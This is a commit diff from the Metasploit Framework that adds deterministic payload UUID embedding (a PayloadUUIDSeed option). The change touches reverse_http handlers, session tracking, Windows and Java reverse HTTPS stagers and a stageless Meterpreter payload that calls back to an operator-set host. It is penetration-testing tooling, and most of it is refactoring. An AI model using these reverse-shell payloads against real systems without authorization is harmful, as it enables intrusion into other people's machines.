Functional Payload UUID embedding via PayloadUUIDSeed

Author: HD Moore

lib/msf/base/serializer/readable_text.rb

@@ -536,6 +536,7 @@ def self.dump_sessions(framework, opts={})
       ]
 
     columns << 'Via' if verbose
+    columns << 'PayloadId' if verbose
 
     tbl = Rex::Ui::Text::Table.new(
       'Indent'  => indent,
@@ -555,7 +556,11 @@ def self.dump_sessions(framework, opts={})
       if session.respond_to? :platform
         row[1] += " " + session.platform
       end
-      row << session.via_exploit if verbose and session.via_exploit
+
+      if verbose
+        row << session.via_exploit.to_s
+        row << session.payload_uuid.to_s
+      end
 
       tbl << row
     }
@@ -566,7 +571,7 @@ def self.dump_sessions(framework, opts={})
   # Dumps the list of running jobs.
   #
   # @param framework [Msf::Framework] the framework.
-  # @param verbose [Boolean] if true, also prints the payload, LPORT, URIPATH 
+  # @param verbose [Boolean] if true, also prints the payload, LPORT, URIPATH
   #   and start time, if they exist, for each job.
   # @param indent [Integer] the indentation amount.
   # @param col [Integer] the column wrap width.

lib/msf/core/handler.rb

@@ -198,6 +198,9 @@ def create_session(conn, opts={})
       # and any relevant information
       s.set_from_exploit(assoc_exploit)
 
+      # Pass along any associated payload uuid if specified
+      s.payload_uuid = opts[:payload_uuid] if opts[:payload_uuid]
+
       # If the session is valid, register it with the framework and
       # notify any waiters we may have.
       if (s)

lib/msf/core/handler/reverse_http.rb

@@ -226,7 +226,7 @@ def on_request(cli, req, obj)
 
     conn_id = nil
     if info[:mode] && info[:mode] != :connect
-      conn_id = generate_uri_connect_uuid(uuid)
+      conn_id = generate_uri_uuid(URI_CHECKSUM_CONN, uuid)
     end
 
     self.pending_connections += 1
@@ -264,7 +264,7 @@ def on_request(cli, req, obj)
           :expiration         => datastore['SessionExpirationTimeout'].to_i,
           :comm_timeout       => datastore['SessionCommunicationTimeout'].to_i,
           :ssl                => ssl?,
-          :uuid               => uuid
+          :payload_uuid       => uuid
         })
 
       when :init_java
@@ -292,7 +292,7 @@ def on_request(cli, req, obj)
           :expiration         => datastore['SessionExpirationTimeout'].to_i,
           :comm_timeout       => datastore['SessionCommunicationTimeout'].to_i,
           :ssl                => ssl?,
-          :uuid               => uuid
+          :payload_uuid       => uuid
         })
 
       when :init_native
@@ -331,7 +331,7 @@ def on_request(cli, req, obj)
           :expiration         => datastore['SessionExpirationTimeout'].to_i,
           :comm_timeout       => datastore['SessionCommunicationTimeout'].to_i,
           :ssl                => ssl?,
-          :uuid               => uuid
+          :payload_uuid       => uuid
         })
 
       when :connect
@@ -347,7 +347,7 @@ def on_request(cli, req, obj)
           :expiration         => datastore['SessionExpirationTimeout'].to_i,
           :comm_timeout       => datastore['SessionCommunicationTimeout'].to_i,
           :ssl                => ssl?,
-          :uuid               => uuid
+          :payload_uuid       => uuid
         })
 
       else

lib/msf/core/handler/reverse_http/uri_checksum.rb

@@ -58,16 +58,27 @@ def process_uri_resource(uri)
           { uri: uri_bare, sum: uri_csum, uuid: uri_uuid, mode: uri_mode }
         end
 
-        # Create a URI that matches the :connect mode with optional UUID, Arch, and Platform
+        # Create a URI that matches the specified checksum and payload uuid
         #
+        # @param sum [Fixnum] A checksum mode value to use for the generated url
         # @param uuid [Msf::Payload::UUID] A valid UUID object
+        # @param len [Fixnum] An optional URI length value, including the leading slash
         # @return [String] The URI string for connections
-        def generate_uri_connect_uuid(uuid)
+        def generate_uri_uuid(sum, uuid, len=nil)
           curl_uri_len = URI_CHECKSUM_UUID_MIN_LEN+rand(URI_CHECKSUM_CONN_MAX_LEN-URI_CHECKSUM_UUID_MIN_LEN)
           curl_prefix  = uuid.to_uri
 
-          # Pad out the URI and make the checksum match :connect
-          "/" + generate_uri_checksum(URI_CHECKSUM_CONN, curl_uri_len, curl_prefix)
+          if len
+            # Subtract a byte to take into account the leading /
+            curl_uri_len = len - 1
+          end
+
+          if curl_uri_len < URI_CHECKSUM_UUID_MIN_LEN
+            raise ArgumentError, "Length must be #{URI_CHECKSUM_UUID_MIN_LEN+1} bytes or greater"
+          end
+
+          # Pad out the URI and make the checksum match the specified sum
+          "/" + generate_uri_checksum(sum, curl_uri_len, curl_prefix)
         end
 
         # Create an arbitrary length URI that matches a given checksum
@@ -77,7 +88,6 @@ def generate_uri_connect_uuid(uuid)
         # @param prefix [String] The optional prefix to use to build the URI
         # @return [String] The URI string that checksums to the given value
         def generate_uri_checksum(sum, len=5, prefix="")
-
           # Lengths shorter than 4 bytes are unable to match all possible checksums
           # Lengths of exactly 4 are relatively slow to find for high checksum values
           # Lengths of 5 or more bytes find a matching checksum fairly quickly (~80ms)
@@ -108,6 +118,17 @@ def generate_uri_checksum(sum, len=5, prefix="")
           end
         end
 
+        # Return the numerical checksum for a given mode symbol
+        #
+        # @param mode [Symbol] The mode symbol to lookup (:connect, :init_native, :init_python, :init_java)
+        # @return [Fixnum] The URI checksum value corresponding with the mode
+        def uri_checksum_lookup(mode)
+          sum = URI_CHECKSUM_MODES.keys.select{|ksum| URI_CHECKSUM_MODES[ksum] == mode}.first
+          unless sum
+            raise ArgumentError, "Unknown checksum mode: #{mode}"
+          end
+          sum
+        end
       end
     end
   end

lib/msf/core/payload/uuid.rb

@@ -104,6 +104,8 @@ def self.generate_raw(opts={})
       puid = seed_to_puid(opts[:seed])
     end
 
+    p opts
+
     puid ||= Rex::Text.rand_text(8)
 
     if puid.length != 8
@@ -281,15 +283,15 @@ def to_uri
     Rex::Text.encode_base64url(self.to_raw)
   end
 
+  def puid_hex
+    self.puid.unpack('H*').first
+  end
+
   def xor_reset
     self.xor1 = self.xor2 = nil
     self
   end
 
-  def puid_hex
-    self.puid.unpack('H*').first
-  end
-
   attr_reader :arch
   attr_reader :platform
 

lib/msf/core/payload/uuid_options.rb

@@ -1,15 +1,61 @@
 # -*- coding => binary -*-
 
+require 'msf/core'
 require 'msf/core/payload/uuid'
+require 'msf/core/handler/reverse_http/uri_checksum'
 
 #
-# This module provides datastore option definitions and helper
-# methods for payload modules that support UUIDs
+# This module provides datastore option definitions and helper methods for payload modules that support UUIDs
 #
-module Msf::Payload::UUID::Options
+module Msf::Payload::UUIDOptions
 
+  include Msf::Handler::ReverseHttp::UriChecksum
 
+  def initialize(info = {})
+    super
+    register_advanced_options(
+      [
+        Msf::OptString.new('PayloadUUIDSeed', [ false, 'A string to use when generating the payload UUID (deterministic)'])
+      ], self.class)
+  end
 
+  #
+  # Generates a URI with a given checksum and optionally with an embedded UUID if
+  # the desired length can accomodate it.
+  #
+  # @param mode [Symbol] The type of checksum to generate (:connect, :init_native, :init_python, :init_java)
+  # @param len [Fixnum] The length of the URI not including the leading slash, optionally nil for random
+  # @return [String] A URI with a leading slash that hashes to the checksum, with an optional UUID
+  #
+  def generate_uri_uuid_mode(mode,len=nil)
+    sum = uri_checksum_lookup(mode)
+
+    # The URI length may not have room for an embedded checksum
+    if len && len < URI_CHECKSUM_UUID_MIN_LEN
+      # Throw an error if the user set a seed, but there is no room for it
+      if datastore['PayloadUUIDSeed'].to_s.length > 0
+        raise ArgumentError, "A PayloadUUIDSeed was specified, but this payload doesn't have enough room for a UUID"
+      end
+      return "/" + generate_uri_checksum(sum, len, prefix="")
+    end
+
+    generate_uri_uuid(sum, generate_payload_uuid, len)
+  end
+
+  # Generate a Payload UUID
+  def generate_payload_uuid
+
+    conf = {
+      arch:     self.arch,
+      platform: self.platform
+    }
+
+    if datastore['PayloadUUIDSeed'].to_s.length > 0
+      conf[:seed] = datastore['PayloadUUIDSeed'].to_s
+    end
+
+    Msf::Payload::UUID.new(conf)
+  end
 
 end
 

lib/msf/core/payload/windows/reverse_http.rb

@@ -3,6 +3,7 @@
 require 'msf/core'
 require 'msf/core/payload/windows/block_api'
 require 'msf/core/payload/windows/exitfunk'
+require 'msf/core/payload/uuid_options'
 
 module Msf
 
@@ -19,6 +20,7 @@ module Payload::Windows::ReverseHttp
   include Msf::Payload::Windows
   include Msf::Payload::Windows::BlockApi
   include Msf::Payload::Windows::Exitfunk
+  include Msf::Payload::UUIDOptions
 
   #
   # Register reverse_http specific options
@@ -99,14 +101,14 @@ def generate_uri
       raise ArgumentError, "Minimum StagerURILength is 5"
     end
 
-    "/" + generate_uri_checksum(Msf::Handler::ReverseHttp::URI_CHECKSUM_INITW, uri_req_len)
+    generate_uri_uuid_mode(:init_native, uri_req_len)
   end
 
   #
   # Generate the URI for the initial stager
   #
   def generate_small_uri
-    "/" + generate_uri_checksum(Msf::Handler::ReverseHttp::URI_CHECKSUM_INITW)
+    generate_uri_uuid_mode(:init_native, 5)
   end
 
   #

lib/msf/core/session.rb

@@ -385,6 +385,10 @@ def alive?
   #
   attr_accessor :exploit_uuid
   #
+  # The unique identifier of the payload that created this session
+  #
+  attr_accessor :payload_uuid
+  #
   # The actual exploit module instance that created this session
   #
   attr_accessor :exploit

modules/payloads/singles/windows/meterpreter_reverse_https.rb

@@ -6,6 +6,7 @@
 require 'msf/core'
 require 'msf/core/handler/reverse_https'
 require 'msf/core/payload/windows/stageless_meterpreter'
+require 'msf/core/payload/uuid_options'
 require 'msf/base/sessions/meterpreter_x86_win'
 require 'msf/base/sessions/meterpreter_options'
 require 'rex/parser/x509_certificate'
@@ -17,6 +18,7 @@ module Metasploit3
   include Msf::Payload::Windows::StagelessMeterpreter
   include Msf::Sessions::MeterpreterOptions
   include Msf::Payload::Windows::VerifySsl
+  include Msf::Payload::UUIDOptions
 
   def initialize(info = {})
 
@@ -37,9 +39,7 @@ def initialize(info = {})
   end
 
   def generate
-    checksum = generate_uri_checksum(Handler::ReverseHttp::UriChecksum::URI_CHECKSUM_CONN)
-    rand = Rex::Text.rand_text_alphanumeric(16)
-    url = "https://#{datastore['LHOST']}:#{datastore['LPORT']}/#{checksum}_#{rand}/"
+    url = "https://#{datastore['LHOST']}:#{datastore['LPORT']}" + generate_uri_uuid_mode(:connect)
 
     generate_stageless_meterpreter(url) do |dll|
 
@@ -66,11 +66,11 @@ def generate
         :expiration     => datastore['SessionExpirationTimeout'].to_i,
         :comm_timeout   => datastore['SessionCommunicationTimeout'].to_i,
         :ua             => datastore['MeterpreterUserAgent'],
-        :proxyhost      => datastore['PROXYHOST'],
-        :proxyport      => datastore['PROXYPORT'],
-        :proxy_type     => datastore['PROXY_TYPE'],
-        :proxy_username => datastore['PROXY_USERNAME'],
-        :proxy_password => datastore['PROXY_PASSWORD'])
+        :proxy_host     => datastore['PayloadProxyHost'],
+        :proxy_port     => datastore['PayloadProxyPort'],
+        :proxy_type     => datastore['PayloadProxyType'],
+        :proxy_username => datastore['PayloadProxyUser'],
+        :proxy_password => datastore['PayloadProxyPass'])
     end
 
   end

modules/payloads/stagers/java/reverse_https.rb

@@ -5,13 +5,15 @@
 
 require 'msf/core'
 require 'msf/core/handler/reverse_https'
+require 'msf/core/payload/uuid_options'
 
 module Metasploit3
 
   CachedSize = 6307
 
   include Msf::Payload::Stager
   include Msf::Payload::Java
+  include Msf::Payload::UUIDOptions
 
   def initialize(info = {})
     super(merge_info(info,
@@ -55,8 +57,7 @@ def config
     c << "Spawn=#{spawn}\n"
     c << "URL=https://#{datastore["LHOST"]}"
     c << ":#{datastore["LPORT"]}" if datastore["LPORT"]
-    c << "/"
-    c << generate_uri_checksum(Msf::Handler::ReverseHttp::URI_CHECKSUM_INITJ, uri_req_len)
+    c << generate_uri_uuid_mode(:init_java, uri_req_len)
     c << "\n"
 
     c